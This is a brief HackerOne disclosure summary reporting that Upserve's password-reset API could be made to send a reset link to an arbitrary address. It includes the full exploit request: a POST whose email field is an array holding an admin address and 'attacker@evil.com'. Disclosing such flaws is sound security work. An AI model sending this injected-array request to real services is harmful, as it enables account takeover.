Upserve : Ability to reset password for account

2018-03-06T21:45:51
ID H1:322985
Type hackerone
Reporter exadmin
Modified 2019-06-06T20:30:51

Description

The attacker was able to send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address.

POST https://hq.breadcrumb.com/api/v1/password_reset HTTP/1.1 with body like {"email_address":["admin@breadcrumb.com","attacker@evil.com"]}